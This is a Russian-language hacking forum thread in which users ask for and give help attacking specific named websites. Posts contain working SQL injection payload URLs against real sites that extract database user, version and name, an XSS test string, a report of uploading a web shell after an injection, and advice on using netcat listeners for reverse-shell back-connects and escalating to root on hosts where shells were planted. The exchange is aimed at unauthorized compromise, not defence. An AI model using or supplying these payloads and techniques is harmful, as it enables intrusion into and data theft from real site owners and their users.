Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Neoveneficus

    Neoveneficus Elder - Старейшина

    Joined:
    10 Apr 2008
    Messages:
    235
    Likes Received:
    126
    Reputations:
    23
    Хм... А что ты собрался делать?

    Я так понимаю в этой папке лежат ключи, которые позволяют пользователям сайта/ов заходить на них, используя зашифрованное соединение ssl - это когда в адресной строке не http:// а https://. В этом случае трафик шифруется. Ключи выдаются специальными, уполномоченными на то, центрами сертификации.

    Наличие сертификата сервера, если я не ошибаюсь, позволяет тебе провести атаку "человек по середине". Но не думаю, что если ты задаешь подобный вопрос, то тебе оно надо...
     
    1 person likes this.
  2. 1west

    1west Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    30
    Likes Received:
    2
    Reputations:
    2
    Помогите разобраться!
    Запрос такой
    ?cu=TT<script>alert('ok')</script>
    вылитело окно -- ок

    На странице появилось
    Error in query
    SELECT qnty_ FROM currency WHERE crncy='TT' ORDER BY date_ DESC LIMIT 1
    1064: You have an error in your SQL syntax near 'ok')' ORDER BY date_ DESC LIMIT 1' at line 1

    Вот мучаю скуль и никак пройти в перед не могу.
    через order+by показывает 1 поле.

    ?cu=TT%27+union+select+111/*
    You have an error in your SQL syntax near 'union select 111/*' ORDER BY date_ DESC LIMIT 1' at line 1

    ?cu=TT%27%2520union%2520select%2520null/*
    Unknown column '20union' in 'where clause'

    ?cu=TT%27+and+(select+111)/*
    You have an error in your SQL syntax near 'select 111)/*' ORDER BY date_ DESC LIMIT 1' at line 1
     
  3. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Сервер фильтрует / попробуй 1' UNION SELECT 1 --

    Или стучись помогу 486503551
     
  4. 1west

    1west Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    30
    Likes Received:
    2
    Reputations:
    2

    здесь проблема в другом.
    /* -- # без разници ошибка одна и таже.
    как я понял тут только подзапросами можно.
    но никак немогу и их использовать.
     
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 1west урлу в студию , поможем
     
  6. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    => You have an error in your SQL syntax near 'ok')' ORDER BY date_ DESC LIMIT 1' at line 1
    => "через order+by показывает 1 поле."
    mysql 3* => You have an error in your SQL syntax near 'union select 111/*' ORDER BY date_ DESC LIMIT 1' at line 1
    mysql 3* => You have an error in your SQL syntax near 'select 111)/*' ORDER BY date_ DESC LIMIT 1' at line 1

    хекерская догадка 45% (с)
     
    5 people like this.
  7. IDW

    IDW New Member

    Joined:
    8 Sep 2008
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://www.prazdnik.by/calendar/?day=-1%27
    Вот, инъекция есть, но немогу расковырять, чтобы не запрашивал не работает :(

    Code:
     [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Март')))) ORDER BY BE.SORT asc' at line 1]
     
  8. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Кавычки слешируються
    '-1\\''))
    фигасе запрос, походу автоматом(аля ORM-генерация) формируеться.
     
    #5848 AkyHa_MaTaTa, 12 Mar 2009
    Last edited: 12 Mar 2009
    2 people like this.
  9. IDW

    IDW New Member

    Joined:
    8 Sep 2008
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    т.е. нельзя инъекцию провести?
     
  10. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Можно, просто внимательно читай, что про синтаксис пишется.
     
    #5850 R1dex, 12 Mar 2009
    Last edited: 12 Mar 2009
  11. IDW

    IDW New Member

    Joined:
    8 Sep 2008
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    :( можешь объяснить? а то я нуб полный :(
     
  12. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://www.prazdnik.by/calendar/?day=-12'))))+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47--+&month=3&year=2009
     
  13. IDW

    IDW New Member

    Joined:
    8 Sep 2008
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    о, спасибо большое, сам бы ни за что не догадался, я за всю жизнь ток 1 инъекцию сделал, даже шелл залил оО, спс
     
  14. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Это ниже 4 версии или я не правильно подобрал кол. выводимых колонок, потому как union не канает?
    http://flb.ru/?path=81&message_id=40+group+by+8--+
     
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    пятая ветка:

    Code:
    http://flb.ru/?path=81&message_id=40+and+substring(version(),1,1)=5
    
     
  16. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    возможно какая то фильтрация :

    PHP:
    http://flb.ru/?path=81&message_id=123+union%0Aselect+1,2,3,4,concat_ws(0x3A,user(),version(),database()),6,7,8--+
     
    1 person likes this.
  17. apekoff

    apekoff New Member

    Joined:
    12 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    собственна давно интересует ламерский вопрос .
    есть два ресурса( хостинга ) на обоих у меня залиты шеллы

    1.


    2.

    вот собственна ...
    А теперь вопрос - как пользоваться NetCat если у меня не выделенный айпи
    Есть хостинг покупной,Смотрел видео как коннектятся через Putty на домен ,ожидают бек коннекта ,биндят в шелле порт и подключаются и как там работает неткат . Попробовал на своем хосте на firstvds.ru - не работает . Нигде фака по инсталлу на сервер нетката не нашел поиск не рулит.
    И второй вопрос - какой софт под эти оси нужен?
    В обоих сервисах есть права на запись .
    Нужен root.
    Спасибо.
     
  18. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    бери ссх(можно попросить у знакомых, если нету), и там неткат на прослушку порта(nc -l -p порт ) и бекконекти (я через шелл от рст это делаю)

    А вот если на ссх нетката нету, то не обязательно устанавливать, можно скомпилить и запускать потом ./netcat -l -p порт
     
    #5858 Iceangel_, 13 Mar 2009
    Last edited: 13 Mar 2009
    2 people like this.
  19. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    http://www.theglobalreport.org/print.php?news_id=100'

    Блин опять запариваюсь на скуле
    Помогите с подбором
     
  20. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    http://www.theglobalreport.org/print.php?news_id=-100'+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
     
Thread Status:
Not open for further replies.